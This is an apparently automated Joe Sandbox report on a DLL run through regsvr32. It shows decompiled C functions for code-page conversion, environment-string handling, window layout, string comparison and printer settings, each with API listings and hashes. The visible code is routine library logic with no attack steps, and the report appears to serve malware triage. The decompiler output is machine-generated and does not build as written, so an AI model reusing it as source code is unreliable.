                                                                        				int _t73;
                                                                        				void* _t77;
                                                                        				int _t81;
                                                                        				short* _t82;
                                                                        				void* _t97;
                                                                        				short* _t98;
                                                                        
                                                                        				_t94 = __esi;
                                                                        				_push(0x38);
                                                                        				_push(0x10042f10);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t54 =  *0x1004c470; // 0x303bb91f
                                                                        				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
                                                                        				 *(_t97 - 0x34) = 0;
                                                                        				 *(_t97 - 0x44) = 0;
                                                                        				_t81 =  *( *(_t97 + 0x14));
                                                                        				 *(_t97 - 0x40) = _t81;
                                                                        				 *(_t97 - 0x3c) = 0;
                                                                        				_t56 =  *(_t97 + 8);
                                                                        				if(_t56 ==  *(_t97 + 0xc)) {
                                                                        					_t82 =  *(_t97 - 0x48);
                                                                        					goto L31;
                                                                        				} else {
                                                                        					_t85 = _t97 - 0x30;
                                                                        					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
                                                                        						 *(_t97 - 0x3c) = 1;
                                                                        					}
                                                                        					if( *(_t97 - 0x3c) == 0) {
                                                                        						_t94 =  *(_t97 - 0x38);
                                                                        					} else {
                                                                        						if(_t81 == 0xffffffff) {
                                                                        							_t77 = E10011820( *(_t97 + 0x10));
                                                                        							_pop(_t85);
                                                                        							_t94 = _t77 + 1;
                                                                        							__eflags = _t94;
                                                                        						} else {
                                                                        							_t94 = _t81;
                                                                        						}
                                                                        						 *(_t97 - 0x38) = _t94;
                                                                        					}
                                                                        					if( *(_t97 - 0x3c) != 0) {
                                                                        						L14:
                                                                        						 *(_t97 - 4) = 0;
                                                                        						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
                                                                        						 *(_t97 - 0x18) = _t98;
                                                                        						_t82 = _t98;
                                                                        						 *(_t97 - 0x48) = _t82;
                                                                        						E10011C50(_t82, 0, _t94 + _t94);
                                                                        						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
                                                                        						_t111 = _t82;
                                                                        						if(_t82 != 0) {
                                                                        							L19:
                                                                        							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
                                                                        							__eflags = _t68;
                                                                        							if(_t68 == 0) {
                                                                        								L31:
                                                                        								__eflags =  *(_t97 - 0x44);
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t82);
                                                                        									E100107C8(_t82, 0, _t94, __eflags);
                                                                        								}
                                                                        								_t57 =  *(_t97 - 0x34);
                                                                        								goto L34;
                                                                        							}
                                                                        							__eflags =  *(_t97 + 0x18);
                                                                        							if( *(_t97 + 0x18) == 0) {
                                                                        								__eflags =  *(_t97 - 0x3c);
                                                                        								if(__eflags != 0) {
                                                                        									L25:
                                                                        									_push(_t94);
                                                                        									_push(1);
                                                                        									_t69 = E1001382A(_t82, 0, _t94, __eflags);
                                                                        									 *(_t97 - 0x34) = _t69;
                                                                        									__eflags = _t69;
                                                                        									if(_t69 != 0) {
                                                                        										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
                                                                        										__eflags = _t70;
                                                                        										if(__eflags != 0) {
                                                                        											__eflags =  *(_t97 - 0x40) - 0xffffffff;
                                                                        											if( *(_t97 - 0x40) != 0xffffffff) {
                                                                        												 *( *(_t97 + 0x14)) = _t70;
                                                                        											}
                                                                        										} else {
                                                                        											_push( *(_t97 - 0x34));
                                                                        											E100107C8(_t82, 0, _t94, __eflags);
                                                                        											 *(_t97 - 0x34) = 0;
                                                                        										}
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
                                                                        								__eflags = _t94;
                                                                        								if(__eflags == 0) {
                                                                        									goto L31;
                                                                        								}
                                                                        								goto L25;
                                                                        							}
                                                                        							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								 *(_t97 - 0x34) =  *(_t97 + 0x18);
                                                                        							}
                                                                        							goto L31;
                                                                        						} else {
                                                                        							_push(_t94);
                                                                        							_push(2);
                                                                        							_t82 = E1001382A(_t82, 0, _t94, _t111);
                                                                        							if(_t82 != 0) {
                                                                        								 *(_t97 - 0x44) = 1;
                                                                        								goto L19;
                                                                        							}
                                                                        							goto L17;
                                                                        						}
                                                                        					} else {
                                                                        						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
                                                                        						 *(_t97 - 0x38) = _t94;
                                                                        						if(_t94 == 0) {
                                                                        							L17:
                                                                        							_t57 = 0;
                                                                        							L34:
                                                                        							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
                                                                        • GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
                                                                        • _strlen.LIBCMT ref: 1001A4FC
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Info$ByteCharMultiWide_strlen
                                                                        • String ID:
                                                                        • API String ID: 1335377746-0
                                                                        • Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                        • Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
                                                                        • Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                        • Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E1001666B() {
                                                                        				int _v4;
                                                                        				int _v8;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t7;
                                                                        				CHAR* _t8;
                                                                        				WCHAR* _t16;
                                                                        				int _t19;
                                                                        				char* _t23;
                                                                        				int _t24;
                                                                        				long _t28;
                                                                        				int _t29;
                                                                        				void* _t34;
                                                                        				WCHAR* _t36;
                                                                        				CHAR* _t37;
                                                                        				intOrPtr _t38;
                                                                        				int _t40;
                                                                        
                                                                        				_t7 =  *0x1004f700; // 0x1
                                                                        				_t29 = 0;
                                                                        				_t36 = 0;
                                                                        				_t38 = 2;
                                                                        				if(_t7 != 0) {
                                                                        					L6:
                                                                        					__eflags = _t7 - 1;
                                                                        					if(__eflags != 0) {
                                                                        						__eflags = _t7 - _t38;
                                                                        						if(_t7 == _t38) {
                                                                        							L21:
                                                                        							_t8 = GetEnvironmentStrings();
                                                                        							_t37 = _t8;
                                                                        							__eflags = _t37 - _t29;
                                                                        							if(_t37 == _t29) {
                                                                        								L20:
                                                                        								return 0;
                                                                        							}
                                                                        							__eflags =  *_t37 - _t29;
                                                                        							if( *_t37 == _t29) {
                                                                        								L25:
                                                                        								_t39 = _t8 - _t37 + 1;
                                                                        								_t34 = E100107B6(_t8 - _t37 + 1);
                                                                        								__eflags = _t34 - _t29;
                                                                        								if(_t34 != _t29) {
                                                                        									E10011440(_t34, _t37, _t39);
                                                                        								} else {
                                                                        									_t34 = 0;
                                                                        								}
                                                                        								FreeEnvironmentStringsA(_t37);
                                                                        								return _t34;
                                                                        							} else {
                                                                        								goto L23;
                                                                        							}
                                                                        							do {
                                                                        								do {
                                                                        									L23:
                                                                        									_t8 =  &(_t8[1]);
                                                                        									__eflags =  *_t8 - _t29;
                                                                        								} while ( *_t8 != _t29);
                                                                        								_t8 =  &(_t8[1]);
                                                                        								__eflags =  *_t8 - _t29;
                                                                        							} while ( *_t8 != _t29);
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags = _t7 - _t29;
                                                                        						if(_t7 == _t29) {
                                                                        							goto L21;
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        					L7:
                                                                        					if(_t36 != _t29) {
                                                                        						L9:
                                                                        						_t16 = _t36;
                                                                        						if( *_t36 == _t29) {
                                                                        							L12:
                                                                        							_t19 = (_t16 - _t36 >> 1) + 1;
                                                                        							_v4 = _t19;
                                                                        							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
                                                                        							if(_t40 != _t29) {
                                                                        								_t23 = E100107B6(_t40);
                                                                        								_v8 = _t23;
                                                                        								if(_t23 != _t29) {
                                                                        									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
                                                                        									_t52 = _t24;
                                                                        									if(_t24 == 0) {
                                                                        										_push(_v8);
                                                                        										E100107C8(_t29, WideCharToMultiByte, _t36, _t52);
                                                                        										_v8 = _t29;
                                                                        									}
                                                                        									_t29 = _v8;
                                                                        								}
                                                                        							}
                                                                        							FreeEnvironmentStringsW(_t36);
                                                                        							return _t29;
                                                                        						} else {
                                                                        							goto L10;
                                                                        						}
                                                                        						do {
                                                                        							do {
                                                                        								L10:
                                                                        								_t16 = _t16 + _t38;
                                                                        							} while ( *_t16 != _t29);
                                                                        							_t16 = _t16 + _t38;
                                                                        						} while ( *_t16 != _t29);
                                                                        						goto L12;
                                                                        					}
                                                                        					_t36 = GetEnvironmentStringsW();
                                                                        					if(_t36 == _t29) {
                                                                        						goto L20;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				_t36 = GetEnvironmentStringsW();
                                                                        				if(_t36 == 0) {
                                                                        					_t28 = GetLastError();
                                                                        					__eflags = _t28 - 0x78;
                                                                        					if(_t28 != 0x78) {
                                                                        						_t7 =  *0x1004f700; // 0x1
                                                                        					} else {
                                                                        						_t7 = _t38;
                                                                        						 *0x1004f700 = _t7;
                                                                        					}
                                                                        					goto L6;
                                                                        				} else {
                                                                        					 *0x1004f700 = 1;
                                                                        					goto L7;
                                                                        				}
                                                                        			}























                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                        • GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                        • GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 883850110-0
                                                                        • Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                        • Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
                                                                        • Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                        • Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
                                                                        				int _v8;
                                                                        				intOrPtr _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				struct tagRECT _v36;
                                                                        				void* _v40;
                                                                        				void* __ebp;
                                                                        				signed int _t61;
                                                                        				int _t62;
                                                                        				signed short _t63;
                                                                        				void* _t64;
                                                                        				void* _t72;
                                                                        				intOrPtr* _t85;
                                                                        				signed int _t87;
                                                                        				struct HWND__* _t91;
                                                                        				void* _t92;
                                                                        
                                                                        				_t72 = __ecx;
                                                                        				_v8 = 0;
                                                                        				_v12 = _a28;
                                                                        				_v16 = 0;
                                                                        				_v20 = 0;
                                                                        				if(_a24 == 0) {
                                                                        					GetClientRect( *(__ecx + 0x1c),  &_v36);
                                                                        				} else {
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        				}
                                                                        				_t61 = _a16 & 0xffff7fff;
                                                                        				_a24 = _t61;
                                                                        				if(_t61 == 1) {
                                                                        					_v40 = _v40 & 0x00000000;
                                                                        				} else {
                                                                        					_v40 = BeginDeferWindowPos(8);
                                                                        				}
                                                                        				_t62 = GetTopWindow( *(_t72 + 0x1c));
                                                                        				while(1) {
                                                                        					_t91 = _t62;
                                                                        					if(_t91 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t63 = GetDlgCtrlID(_t91);
                                                                        					_push(_t91);
                                                                        					_t87 = _t63 & 0x0000ffff;
                                                                        					_t64 = E10022115();
                                                                        					if(_t87 != _a12) {
                                                                        						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
                                                                        							SendMessageA(_t91, 0x361, 0,  &_v40);
                                                                        						}
                                                                        					} else {
                                                                        						_v8 = _t91;
                                                                        					}
                                                                        					_t62 = GetWindow(_t91, 2);
                                                                        				}
                                                                        				if(_a24 != 1) {
                                                                        					if(_a12 != 0 && _v8 != 0) {
                                                                        						_t62 = E100220EE(_t92, _v8);
                                                                        						if(_a24 == 2) {
                                                                        							_t85 = _a20;
                                                                        							_v36.left = _v36.left +  *_t85;
                                                                        							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
                                                                        							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
                                                                        							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
                                                                        						}
                                                                        						if((_a17 & 0x00000080) == 0) {
                                                                        							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
                                                                        							_t62 = E10020D81( &_v40, _v8,  &_v36);
                                                                        						}
                                                                        					}
                                                                        					if(_v40 != 0) {
                                                                        						_t62 = EndDeferWindowPos(_v40);
                                                                        					}
                                                                        				} else {
                                                                        					if(_a28 == 0) {
                                                                        						_t62 = _a20;
                                                                        						 *((intOrPtr*)(_t62 + 8)) = _v20;
                                                                        						 *((intOrPtr*)(_t62 + 4)) = 0;
                                                                        						 *_t62 = 0;
                                                                        						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
                                                                        					} else {
                                                                        						_t62 = CopyRect(_a20,  &_v36);
                                                                        					}
                                                                        				}
                                                                        				return _t62;
                                                                        			}




















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                        • String ID:
                                                                        • API String ID: 1228040700-0
                                                                        • Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                        • Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
                                                                        • Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                        • Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
                                                                        				intOrPtr _v8;
                                                                        				short _v528;
                                                                        				short _v1048;
                                                                        				short _v1568;
                                                                        				intOrPtr _t18;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				void* _t23;
                                                                        				char* _t32;
                                                                        				int _t37;
                                                                        				char* _t42;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        
                                                                        				_t18 =  *0x1004c470; // 0x303bb91f
                                                                        				_t42 = _a4;
                                                                        				_v8 = _t18;
                                                                        				if(lstrcmpiA(_t42, _a8) == 0) {
                                                                        					_t20 = GetSystemMetrics(0x2a);
                                                                        					if(_t20 != 0) {
                                                                        						_t21 = lstrlenA(_t42);
                                                                        						if(_t21 != lstrlenA(_a8)) {
                                                                        							L13:
                                                                        							_t23 = 0;
                                                                        						} else {
                                                                        							_t37 = GetThreadLocale();
                                                                        							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
                                                                        							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
                                                                        							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
                                                                        							_t32 = _t42;
                                                                        							if( *_t42 == 0) {
                                                                        								L10:
                                                                        								_t23 = 1;
                                                                        							} else {
                                                                        								_t47 = 0;
                                                                        								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
                                                                        									_t47 = _t47 + 2;
                                                                        									if( *_t32 != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L10;
                                                                        									}
                                                                        									goto L11;
                                                                        								}
                                                                        								goto L13;
                                                                        							}
                                                                        						}
                                                                        						L11:
                                                                        					} else {
                                                                        						_t23 = _t20 + 1;
                                                                        					}
                                                                        				} else {
                                                                        					_t23 = 0;
                                                                        				}
                                                                        				return E100117AE(_t23, _v8);
                                                                        			}

















                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                        • GetSystemMetrics.USER32 ref: 10025388
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystemlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 2335526769-0
                                                                        • Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                        • Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
                                                                        • Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                        • Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E1001F60C(void* __ecx, char* _a4) {
                                                                        				void* _v8;
                                                                        				void* _t15;
                                                                        				void* _t20;
                                                                        				void* _t35;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t35 = __ecx;
                                                                        				_t15 =  *(__ecx + 0x70);
                                                                        				if(_t15 != 0) {
                                                                        					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                        					if(_t15 == 0) {
                                                                        						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                        						if(_t15 != 0) {
                                                                        							_t18 =  *(_t35 + 0x6c);
                                                                        							if( *(_t35 + 0x6c) != 0) {
                                                                        								E10029C1B(_t18);
                                                                        							}
                                                                        							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                        							 *(_t35 + 0x6c) = _t20;
                                                                        							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                        								E10029C1B( *(_t35 + 0x6c));
                                                                        								 *(_t35 + 0x6c) = 0;
                                                                        							}
                                                                        							_t15 = ClosePrinter(_v8);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t15;
                                                                        			}








                                                                        APIs
                                                                        • GlobalLock.KERNEL32 ref: 1001F629
                                                                        • lstrcmpA.KERNEL32(?,?), ref: 1001F635
                                                                        • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
                                                                        • GlobalLock.KERNEL32 ref: 1001F679
                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
                                                                        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E
                                                                          • Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
                                                                          • Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
                                                                          • Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                        • String ID:
                                                                        • API String ID: 168474834-0
                                                                        • Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                        • Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
                                                                        • Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                        • Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E100074F2(void* __ebx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t132;
                                                                        				int* _t133;
                                                                        				int _t138;
                                                                        				intOrPtr* _t139;
                                                                        				int _t142;
                                                                        				int* _t143;
                                                                        				int _t146;
                                                                        				int _t171;
                                                                        				intOrPtr _t172;
                                                                        				int _t173;
                                                                        				intOrPtr _t178;
                                                                        				int _t183;
                                                                        				int _t186;
                                                                        				void* _t187;
                                                                        				int* _t191;
                                                                        				void* _t213;
                                                                        				int* _t216;
                                                                        				short _t217;
                                                                        				intOrPtr* _t225;
                                                                        				void* _t227;
                                                                        				struct tagRECT _t228;
                                                                        				int* _t229;
                                                                        				signed int _t233;
                                                                        				int* _t235;
                                                                        				int* _t237;
                                                                        				int* _t238;
                                                                        				void* _t239;
                                                                        
                                                                        				_t227 = __esi;
                                                                        				E10011BF0(0x1003a548, _t239);
                                                                        				_t132 =  *0x1004c470; // 0x303bb91f
                                                                        				_t225 =  *((intOrPtr*)(_t239 + 0x14));
                                                                        				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
                                                                        				_t183 = 0;
                                                                        				_t133 = _t225 + 0x12;
                                                                        				 *(_t239 - 0x34) = _t133;
                                                                        				if( *(_t239 + 0x10) != 0) {
                                                                        					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
                                                                        					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
                                                                        					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
                                                                        					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
                                                                        					 *((short*)(_t239 - 0x4a)) =  *_t133;
                                                                        					_t216 = _t225 + 0x18;
                                                                        					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
                                                                        					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
                                                                        					_t225 = _t239 - 0x58;
                                                                        					 *(_t239 - 0x34) = _t216;
                                                                        				}
                                                                        				_t217 =  *((short*)(_t225 + 0xa));
                                                                        				_push(_t227);
                                                                        				_t228 =  *((short*)(_t225 + 8));
                                                                        				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
                                                                        				 *(_t239 - 0x68) = _t228;
                                                                        				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
                                                                        				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
                                                                        				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
                                                                        				_t229 =  *(_t239 + 0x1c);
                                                                        				 *(_t239 - 0x28) = _t183;
                                                                        				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
                                                                        					_t186 =  *_t229;
                                                                        					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
                                                                        					_t229 =  &(_t229[1]);
                                                                        					if(_t186 > 0) {
                                                                        						__imp__#4(_t229, _t186);
                                                                        						_t187 = _t186 + _t186;
                                                                        						_t229 = _t229 + _t187;
                                                                        						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
